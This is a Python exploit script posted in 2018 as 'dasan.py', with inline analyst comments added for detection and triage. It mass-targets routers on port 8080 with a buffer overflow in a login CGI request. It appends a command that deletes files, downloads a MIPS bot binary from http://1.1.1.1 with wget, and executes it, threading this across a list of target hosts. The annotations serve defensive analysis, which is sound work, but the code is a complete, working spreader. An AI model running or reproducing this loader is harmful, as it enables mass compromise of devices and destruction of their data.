
dasan.py

wtfbbq Jun 18th, 2018 (edited) 779 Never
  1. #!/usr/bin/python
  2.  
  3. #zonehax is big 0 day exploiter 10/10
  4. import sys, socket, json, time, ssl, struct, os
  5. from threading import Thread
     # Analyst note: this listing is a mass-exploitation loader, annotated here
     # for detection and triage. It takes one argument, a file of target hosts
     # (one per line), and exits after a usage message when that is missing.
  6. if len(sys.argv) < 2:
  7.     print "Usage: python "+sys.argv[0]+" <list>"
  8.     sys.exit()
     # Every target is contacted on TCP/8080; at most `buf` bytes of the reply
     # are read back.
  9. port = 8080
  10. buf = 4096
      # Two absolute 32-bit addresses are derived from one hard-coded base and
      # packed big-endian (">i").
      # NOTE(review): presumably the base is a library load address on the
      # targeted firmware - confirm against the device. Fixed addresses like
      # these only hold where the memory layout never changes, so address
      # randomisation on the device would invalidate them.
  11. pre_pl0 = 0x2ad0c000
  12. pre_pl2 = pre_pl0 + 0x00115d40
  13. pl2 = struct.pack(">i",pre_pl2)
  14. pre_pl3 = pre_pl0 + 0x0003CC9C
  15. pl3 =  struct.pack(">i",pre_pl3)
  16.  
      # Shell command carried at the end of the request body: it deletes the
      # working directory contents, downloads a MIPS binary over plain HTTP,
      # marks it executable and runs it with the argument "exploit.dasan".
      # Indicators visible here: the URL path /bins/wicked.mips, the file name
      # wicked.mips and the argument string.
      # NOTE(review): 1.1.1.1 looks like a placeholder left by the poster, not
      # the real staging host - confirm before using it as an indicator.
      # payload2..payload4 are byte-for-byte copies of payload.
  17. payload = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  18. payload2 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  19. payload3 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
  20. payload4 = "rm -rf *; wget http://1.1.1.1/bins/wicked.mips; chmod 777 wicked.mips; ./wicked.mips exploit.dasan"
      # Value placed in the `action` form field: 780 bytes of filler ('A', 'C',
      # ';') and the two packed addresses, followed by the command above.
      # The packed addresses are concatenated as raw bytes with no URL
      # encoding, so the body carries non-printable/high bytes even though it
      # is declared as application/x-www-form-urlencoded. An oversized `action`
      # value with raw binary and shell metacharacters in a login POST is the
      # network-visible signature of this request.
  21. pre_data = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload
  22. pre_data2 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload2
  23. pre_data3 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload3
  24. pre_data4 = "A"*(756 - 0x28) + pl3 + 'C'*(0x28-8) + pl2 + ';'*24 + payload4
      # Login form body; the user id and password fields are the throwaway
      # value "a", so no credentials are involved in the request.
  25. post_data = "action="+pre_data+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  26. post_data2 = "action="+pre_data2+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  27. post_data3 = "action="+pre_data3+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
  28. post_data4 = "action="+pre_data4+"&txtUserId=a&button=Login&txtPassword=a&sle_Language=english\r\n"
      # Each headersN string is a complete raw HTTP request (request line,
      # headers and body) to POST /cgi-bin/login_action.cgi. Host and Referer
      # are fixed to 192.168.1.100:8080 whatever the real target is, so a Host
      # header that does not match the device's own address is a usable
      # detection signal. Content-Length is computed from the matching body.
      # dasan() below sends headers, headers2 and headers3; headers4 is built
      # but not sent anywhere in this listing.
  29. headers = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data))+"\r\n\r\n"+str(post_data)
  30. headers2 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data2))+"\r\n\r\n"+str(post_data2)
  31. headers3 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data3))+"\r\n\r\n"+str(post_data3)
  32. headers4 = "POST /cgi-bin/login_action.cgi HTTP/1.1\r\nHost: 192.168.1.100:8080\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: https://192.168.1.100:8080/cgi-bin/login.cgi\r\nConnection: keep-alive\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: "+str(len(post_data4))+"\r\n\r\n"+str(post_data4)
      # i counts targets whose reply contained "200 OK" (updated in dasan()).
      # ips holds the raw lines of the target file, read once at start-up; the
      # file object is never closed explicitly.
  33. i = 0
  34. ips = open(sys.argv[1]).readlines()
  35.  
      # Per-target sender, run in its own thread (see worker()). Opens a TLS
      # connection to host:8080, sends three of the prebuilt requests back to
      # back, reads one reply of up to `buf` bytes and increments the global
      # counter when that reply contains "200 OK". Returns nothing.
  36. def dasan(host):
  37.     global i
  38.     host = host.strip("\n")
  39.     try:
  40.         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
              # wrap_socket is called with its defaults, so no certificate
              # verification is requested; no socket timeout is set either.
  41.         s = ssl.wrap_socket(sock)
  42.         s.connect((host, port))
              # Three identical requests on one connection: in server logs this
              # shows up as repeated oversized login POSTs within one TLS session.
  43.         s.send(headers)
  44.         s.send(headers2)
  45.         s.send(headers3)
  46.         resp = s.recv(buf).strip()
              # "200 OK" only shows that the web server answered; nothing here
              # checks whether the command ran, so the counter is not a count
              # of compromised devices. The increment is not synchronised
              # between threads.
  47.         if "200 OK" in resp:
  48.             i += 1
  49.         s.close()
          # Bare except: every failure (refused connection, TLS error, reset)
          # is discarded silently, and the socket is not closed on that path.
  50.     except:
  51.         pass
  52.        
      # Dispatcher: starts one dasan() thread per line of the target list with a
      # 10 ms pause between starts and no cap on the number of live threads, so
      # a single source opens on the order of 100 new connections per second.
      # After the list is exhausted it waits 30 s and calls sys.exit.
  53. def worker():
  54.     for ip in ips:
  55.         try:
  56.             ip = ip.strip("\r\n")
  57.             t = Thread(target=dasan, args=(ip,))
  58.             t.start()
  59.             time.sleep(0.01)
              # Failures to start a thread are ignored and the loop moves on.
  60.         except:
  61.             pass
  62.     time.sleep(30)
          # NOTE(review): worker() is started as a Thread in this listing, so
          # this exit is raised inside that thread rather than in the main one.
  63.     sys.exit("Finished Scanning")
      # Main flow: run the dispatcher in a background thread, dump the first
      # prebuilt request (headers plus body, including the command string) to
      # stdout once, then redraw a one-line status counter every second.
  64. workerthrd = Thread(target=worker)
  65. workerthrd.start()
  66. print headers
  67. while True:
  68.     try:
              # `sent` is assigned but never read; the status line uses `i`.
  69.         sent = i
              # ANSI colour escapes plus "\r" redraw the same terminal line.
  70.         sys.stdout.write("\r\033[33mPayload Sent To \033[92m[\033[93m"+str(i)+"\033[92m]\033[33m Devices\033[0m")
  71.         sys.stdout.flush()
  72.         time.sleep(1)
          # Ctrl-C is the only exit handled in this loop; any other exception
          # is swallowed and the loop continues.
  73.     except KeyboardInterrupt:
  74.         sys.exit("Exiting On User Input")
  75.     except:
  76.         pass